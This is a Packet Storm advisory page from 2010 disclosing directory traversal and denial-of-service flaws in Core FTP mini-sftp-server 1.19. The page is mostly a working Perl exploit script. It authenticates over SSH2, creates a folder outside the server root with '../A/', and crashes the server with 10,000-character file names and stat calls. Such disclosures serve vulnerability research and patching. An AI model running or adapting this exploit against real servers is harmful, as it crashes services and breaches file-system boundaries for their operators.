what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Core FTP mini-sftp-server 1.19 Denial Of Service / Traversal

Core FTP mini-sftp-server 1.19 Denial Of Service / Traversal
Posted Jun 8, 2010
Authored by leinakesi

Corp FTP mini-sftp-server version 1.19 suffers from denial of service and directory traversal vulnerabilities.

tags | exploit, denial of service, vulnerability, file inclusion
SHA-256 | 1bda45e831021e6fad0de87ddf5784ab52481f5fb78087dafb3fefa993362cf9

Core FTP mini-sftp-server 1.19 Denial Of Service / Traversal

Change Mirror Download
Date of Discovery:
7-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html

Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.

Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities.

1. Directory Traversal vulnerability:
$m = $sftp->mkdir("../A/");# create a folder outside the root directory

2. Denial of Service vulnerability:
$o1 = $sftp->open("A" x 10000);
$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
$o3 = $sftp->open("test", $FUZZ, 0666); $o3 = $sftp->open("test", $FUZZ, 0666);
$st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;


$FUZZ = "A" x 10000;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("../A/");

#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();
Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    25 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close